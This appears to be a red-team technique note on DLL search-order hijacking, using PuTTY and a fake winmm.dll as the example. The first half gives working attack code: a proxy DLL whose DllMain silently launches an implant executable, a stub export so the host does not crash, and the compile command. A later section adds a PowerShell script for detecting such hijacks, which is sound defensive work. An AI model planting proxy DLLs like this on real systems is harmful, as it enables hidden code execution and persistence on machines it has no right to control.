DLL Hijacking
Procmon:
Open Procmon (Sysinternals) and filter for 'not found' results to see which DLLs the target tries to load from a location where they do not exist.
Once a candidate DLL has been found, identify which of its functions the host imports (and therefore which you need to implement) by running:
dumpbin /imports PATH
From the dumpbin output, find the DLL you intend to hijack; for this example we will use 'winmm.dll' and hijack PUTTY.exe. Look up the imported functions (e.g. PlaySoundA) to get their documented prototypes:
BOOL PlaySound(
    LPCTSTR pszSound,
    HMODULE hmod,
    DWORD   fdwSound
);
Open a debugger matching the architecture of the executable, find where the application loads the library, and step through the identified calls to check what it does. For the example above, the debugger should show something similar to:
PlaySoundA (dword, dword, dword)
Then create the following DLL (updating the exports and function signatures to match your binary):
winmm.def:
LIBRARY "WinMM"
EXPORTS
PlaySoundA
winmm.cpp:
#include <Windows.h>

// DllMain runs when the host process loads this DLL; on process attach it
// launches the payload and returns TRUE so the host keeps running normally.
BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    STARTUPINFOA info = { sizeof(info) };
    PROCESS_INFORMATION processInfo = { 0 };
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
        // lpCommandLine is NULL (a "" literal is not a writable LPSTR)
        if (CreateProcessA(
                "c:\\implant\\implant.exe",
                NULL, NULL, NULL, TRUE, 0, NULL, NULL,
                &info, &processInfo)) {
            // close the returned handles so the DLL does not leak them
            CloseHandle(processInfo.hThread);
            CloseHandle(processInfo.hProcess);
        }
        break;   // original fell through into the other cases
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

// Stub export so the host's call to PlaySoundA resolves; the real winmm
// function is never called, so the sound is simply dropped.
extern "C" {
__declspec(dllexport) BOOL WINAPI PlaySoundA(
    LPCSTR  pszSound,
    HMODULE hmod,
    DWORD   fdwSound) {
    return TRUE;
}
}
and compile using:
@ECHO OFF
cl.exe /W0 /D_USRDLL /D_WINDLL winmm.cpp winmm.def /MT /link /DLL /OUT:winmm.dll
(making sure the build targets the same architecture as the executable)
Place the DLL into the hijacking path identified in Procmon and it should be a hit.
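As an added defensive check (not part of the original note), the following PowerShell script lists every DLL a running process such as putty has loaded from outside the Windows system directories and reports its Authenticode status; a winmm.dll resolving to the application's own folder is exactly the artefact the hijack above leaves behind. The $knownSystemDlls list is an assumption and should be extended from the dumpbin output for the binary being checked.

```powershell
# Hunt for search-order hijacks: modules loaded from outside the system
# directories, especially ones that share a name with a system DLL.
param(
    [Parameter(Mandatory = $true)][string]$ProcessName   # e.g. "putty"
)

$systemDirs = @(
    (Join-Path $env:SystemRoot 'System32'),
    (Join-Path $env:SystemRoot 'SysWOW64'),
    (Join-Path $env:SystemRoot 'WinSxS')
)

# Assumed starting list: DLL names that should only ever resolve to a
# system directory. Extend it with the imports dumpbin reports.
$knownSystemDlls = @('winmm.dll', 'version.dll', 'dbghelp.dll', 'cryptsp.dll')

foreach ($proc in Get-Process -Name $ProcessName -ErrorAction Stop) {
    try {
        $modules = $proc.Modules
    } catch {
        # 32-bit PowerShell cannot enumerate modules of a 64-bit process
        Write-Warning "Cannot enumerate modules of PID $($proc.Id): $_"
        continue
    }
    foreach ($m in $modules) {
        $path = $m.FileName
        $dir  = Split-Path -Parent $path
        $inSystemDir = $false
        foreach ($s in $systemDirs) {
            if ($dir.StartsWith($s, [System.StringComparison]::OrdinalIgnoreCase)) {
                $inSystemDir = $true
            }
        }
        if ($inSystemDir) { continue }

        $name = $m.ModuleName.ToLower()
        $sig  = Get-AuthenticodeSignature -FilePath $path
        # Flag a system DLL name living outside the system dirs, or any
        # non-system module without a valid signature.
        $suspicious = ($knownSystemDlls -contains $name) -or ($sig.Status -ne 'Valid')

        [pscustomobject]@{
            Process    = $proc.ProcessName
            Pid        = $proc.Id
            Module     = $m.ModuleName
            Path       = $path
            Signature  = $sig.Status
            Suspicious = $suspicious
        }
    }
}
```

Run it from a PowerShell process of the same architecture as the target; rows with Suspicious = True are the loads worth investigating.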